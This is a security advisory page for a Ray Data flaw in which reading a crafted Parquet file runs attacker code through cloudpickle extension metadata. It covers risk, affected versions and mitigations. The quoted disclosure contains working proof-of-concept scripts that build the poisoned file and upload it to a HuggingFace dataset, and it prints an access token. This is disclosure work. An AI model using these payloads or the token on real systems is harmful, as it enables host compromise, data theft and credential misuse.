CVE-2026-41486: Ray: Parquet RCE via Arrow extension deserialization

GHSA-mw35-8rx3-xf9r HIGH CISA: TRACK*
Published April 24, 2026
CISO Take

Ray Data versions 2.49.0–2.54.0 allow arbitrary code execution simply by reading a crafted Parquet file — no cluster access, credentials, or user interaction required beyond normal pipeline operation. Ray registers custom Arrow extension types globally at import that automatically invoke cloudpickle.loads() on field metadata during schema parsing, meaning a poisoned file from a data lake, HuggingFace dataset, or shared storage executes attacker code before any data row is read. With 847 downstream dependents, a top-76th-percentile EPSS score, and Ray's own documentation recommending the exact attack vector (reading HuggingFace Parquet datasets via HfFileSystem), the blast radius spans training pipelines, data ingestion workflows, and multi-tenant Ray clusters where a full end-to-end PoC has been verified. Upgrade to Ray 2.55.0 immediately; if blocked, restrict Parquet ingestion to trusted signed sources, scan existing datasets for anomalous cloudpickle magic bytes in extension metadata, and isolate worker process permissions.

Sources: GitHub Advisory EPSS OpenSSF ATLAS NVD

What is the risk?

Critical. The attack requires no authentication, no cluster membership, and triggers automatically during routine data loading — exactly the threat model Ray's own security documentation claims network isolation handles. The existing check_for_legacy_tensor_type() guard is ineffective: it targets PyExtensionType, not the currently vulnerable extension types, and runs after schema parsing has already completed (and RCE has already fired). Because extension types register globally at ray.data import, every pandas.read_parquet() and pyarrow.parquet.read_table() call in the same process is affected, not just ray.data.read_parquet(). The cloudpickle-first deserialization strategy ensures the payload executes before the JSON fallback is ever reached. With a fully working end-to-end PoC demonstrated via HuggingFace and no patch deployed in the 2.49.0–2.54.0 range, risk is critical.

How does the attack unfold?

Payload Craft
Adversary creates a valid Parquet file with a tensor column whose ARROW:extension:metadata field embeds a cloudpickle-serialized object with a malicious __reduce__ method.
AML.T0017.000
Distribution
Crafted Parquet file is uploaded to a public HuggingFace dataset, shared data lake bucket, or storage path known to be read by target Ray Data pipelines.
AML.T0019
Automatic Trigger
Ray Data worker imports ray.data (globally registering Arrow extension types), then reads the Parquet file — PyArrow calls cloudpickle.loads() on the malicious metadata during schema parsing before any row is read.
AML.T0011.000
Host Compromise
Attacker code executes as the Ray worker process user, enabling reverse shell establishment, credential theft, model exfiltration, or lateral movement throughout the cluster.
AML.T0112

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Ray pip >= 2.49.0, < 2.55.0 2.55.0
42.9K OpenSSF 5.7 873 dependents Pushed 3d ago 83% patched ~139d to patch Full package profile →

Do you use Ray? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
0.5%
chance of exploitation in 30 days
Higher than 37% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Moderate

What should I do?

7 steps
  1. Upgrade ray to 2.55.0 — the fix replaces cloudpickle.loads() with json.loads() in _deserialize_with_fallback(), eliminating the unsafe deserialization path.

  2. If immediate upgrade is blocked, avoid reading Parquet files from untrusted, externally-controlled, or publicly-writable sources.

  3. In multi-tenant environments, enforce strict storage isolation to prevent cross-team Parquet file access to shared buckets.

  4. Scan existing Parquet datasets for anomalous ARROW:extension:metadata fields containing cloudpickle magic bytes (\x80\x05 header).

  5. Monitor Ray worker processes for unexpected subprocess spawns, outbound connections, or file writes during data loading phases.

  6. Audit all ray.data.read_parquet() call sites and HuggingFace dataset loading patterns in production pipelines.

  7. Apply least-privilege to Ray worker process accounts to limit blast radius if exploited.

What does CISA's SSVC say?

Decision Track*
Exploitation none
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
6.1.2 - Information security risk assessment 8.4 - AI system data
NIST AI RMF
GOVERN 6.1 - AI Risk Management - Supply Chain MANAGE 2.2 - Mechanisms to respond to identified AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-41486?

Ray Data versions 2.49.0–2.54.0 allow arbitrary code execution simply by reading a crafted Parquet file — no cluster access, credentials, or user interaction required beyond normal pipeline operation. Ray registers custom Arrow extension types globally at import that automatically invoke cloudpickle.loads() on field metadata during schema parsing, meaning a poisoned file from a data lake, HuggingFace dataset, or shared storage executes attacker code before any data row is read. With 847 downstream dependents, a top-76th-percentile EPSS score, and Ray's own documentation recommending the exact attack vector (reading HuggingFace Parquet datasets via HfFileSystem), the blast radius spans training pipelines, data ingestion workflows, and multi-tenant Ray clusters where a full end-to-end PoC has been verified. Upgrade to Ray 2.55.0 immediately; if blocked, restrict Parquet ingestion to trusted signed sources, scan existing datasets for anomalous cloudpickle magic bytes in extension metadata, and isolate worker process permissions.

Is CVE-2026-41486 actively exploited?

No confirmed active exploitation of CVE-2026-41486 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-41486?

1. Upgrade ray to 2.55.0 — the fix replaces cloudpickle.loads() with json.loads() in _deserialize_with_fallback(), eliminating the unsafe deserialization path. 2. If immediate upgrade is blocked, avoid reading Parquet files from untrusted, externally-controlled, or publicly-writable sources. 3. In multi-tenant environments, enforce strict storage isolation to prevent cross-team Parquet file access to shared buckets. 4. Scan existing Parquet datasets for anomalous ARROW:extension:metadata fields containing cloudpickle magic bytes (\x80\x05 header). 5. Monitor Ray worker processes for unexpected subprocess spawns, outbound connections, or file writes during data loading phases. 6. Audit all ray.data.read_parquet() call sites and HuggingFace dataset loading patterns in production pipelines. 7. Apply least-privilege to Ray worker process accounts to limit blast radius if exploited.

What systems are affected by CVE-2026-41486?

This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Data ingestion pipelines, Multi-tenant ML platforms, Distributed computing clusters, HuggingFace dataset readers.

What is the CVSS score for CVE-2026-41486?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

Training pipelinesData ingestion pipelinesMulti-tenant ML platformsDistributed computing clustersHuggingFace dataset readers

MITRE ATLAS Techniques

AML.T0002.000 Datasets
AML.T0010.001 AI Software
AML.T0010.002 Data
AML.T0011.000 Unsafe AI Artifacts
AML.T0019 Publish Poisoned Datasets

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: 6.1.2, 8.4
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

# Remote Code Execution via Parquet Arrow Extension Type Deserialization ## Summary Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read. In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability. Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026. ## Details ### Extension type registration Ray Data registers three Arrow extension types globally in PyArrow: ```python # python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605 pa.register_extension_type(ArrowTensorType((0,), pa.int64())) pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64())) pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0)) ``` Registration happens at module load time ([`__init__.py:94-95`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources. ### The code path to `cloudpickle.loads()` All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`: ```python # python/ray/data/_internal/tensor_extensions/arrow.py:84-96 def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"): """Deserialize data with cloudpickle first, fallback to JSON.""" try: # Try cloudpickle first (new format) return cloudpickle.loads(serialized) # <-- arbitrary code execution except Exception: # Fallback to JSON format (legacy) try: return json.loads(serialized) except json.JSONDecodeError: raise ValueError( f"Unable to deserialize {field_name} from {type(serialized)}" ) ``` The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached. For `ArrowTensorType`, the call chain is: ``` __arrow_ext_deserialize__(cls, storage_type, serialized) # arrow.py:176 -> _arrow_ext_deserialize_cache(serialized, value_type) # arrow.py:178 -> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652 -> _deserialize_with_fallback(serialized, "shape") # arrow.py:653 -> cloudpickle.loads(serialized) # arrow.py:88 RCE ``` `ArrowTensorTypeV2` ([`arrow.py:679-680`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern. ### Why the existing mitigation doesn't help After issue [#41314](https://github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types: ```python # python/ray/data/_internal/datasource/parquet_datasource.py:146-170 def check_for_legacy_tensor_type(schema): """Check for the legacy tensor extension type and raise an error if found. Ray Data uses an extension type to represent tensors in Arrow tables. Previously, the extension type extended `PyExtensionType`. However, this base type can expose users to arbitrary code execution. To prevent this, we don't load the type by default. """ for name, type in zip(schema.names, schema.types): if isinstance(type, pa.UnknownExtensionType) and isinstance( type, pa.PyExtensionType ): raise RuntimeError(...) ``` This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently-registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred. ### Outside Ray's documented threat model Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file. ## Impact - **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #54831](https://github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0. - **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc. - **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise. - **Severity**: Critical ### Attack scenarios 1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below). 2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context. 3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently. ## PoC We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace. **Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`). ### PoC 1: Local file Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing. **1. Create the Parquet file:** ```bash cat > craft_parquet.py << 'SCRIPT' import cloudpickle import pyarrow as pa import pyarrow.parquet as pq COMMAND = "id > /tmp/ray-tensor-rce-proof" class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, "crafted.parquet") print("Created crafted.parquet") SCRIPT uv run --with 'cloudpickle,pyarrow' python craft_parquet.py ``` **2. Read it with Ray Data:** ```bash rm -f /tmp/ray-tensor-rce-proof uv run --with 'ray[data]' python -c " import ray.data ray.data.read_parquet('crafted.parquet') " cat /tmp/ray-tensor-rce-proof # Expected: output of 'id' — confirms code execution ``` ### PoC 2: End-to-end via HuggingFace This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face). We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access. **Upload script** (for reference, this is how we seeded the dataset): ```bash cat > upload_dataset.py << 'SCRIPT' # /// script # requires-python = ">=3.10" # dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"] # /// """Upload a crafted Parquet file to a HuggingFace dataset. Prerequisites: huggingface-cli login (with a write token) Usage: uv run upload_dataset.py <repo_id> <command> """ import sys, tempfile from pathlib import Path import cloudpickle, pyarrow as pa, pyarrow.parquet as pq from huggingface_hub import HfApi def build_parquet(output, command): class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, str(output)) repo_id, command = sys.argv[1], sys.argv[2] with tempfile.TemporaryDirectory() as tmpdir: parquet = Path(tmpdir) / "train.parquet" build_parquet(parquet, command) HfApi().upload_file( path_or_fileobj=str(parquet), path_in_repo="data/train.parquet", repo_id=repo_id, repo_type="dataset", ) print(f"Uploaded to https://huggingface.co/datasets/{repo_id}") SCRIPT # We ran: # uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof' ``` **Reproduce** (reads the dataset from HuggingFace, no local files needed): ```bash rm -f /tmp/ray-tensor-rce-proof HF_TOKEN=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 \ uv run --with 'ray[data],huggingface_hub' python -c " import ray.data from huggingface_hub import HfFileSystem ray.data.read_parquet( 'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet', filesystem=HfFileSystem(), ) " cat /tmp/ray-tensor-rce-proof # Expected: output of 'id' — confirms code execution via HuggingFace dataset ``` The token above is read-only. The dataset is private to prevent unintended exposure. ## Suggested fix The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle. 1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`). 2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk. 3. **Add a security note to `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered. Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.

Exploitation Scenario

An adversary registers a free HuggingFace account and uploads a Parquet file crafted to look like a legitimate ML tensor dataset — normal tensor, id, and text columns. The tensor column's ARROW:extension:metadata contains a cloudpickle-serialized Python object whose __reduce__ method executes a reverse shell command. Standard Parquet inspection tools (parquet-tools, DuckDB) display the file as normal because they ignore extension metadata. A victim data engineer, following Ray's own documented pattern for loading HuggingFace datasets, runs ray.data.read_parquet('hf://datasets/attacker/dataset', filesystem=HfFileSystem()). The moment PyArrow parses the Parquet schema, it calls __arrow_ext_deserialize__ on the registered ray.data.arrow_tensor type, which calls _deserialize_with_fallback(), which calls cloudpickle.loads() — executing the reverse shell as the Ray worker user and granting full host access before a single data row is processed.

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

Timeline

Published
April 24, 2026
Last Modified
April 24, 2026
First Seen
April 24, 2026

Related Vulnerabilities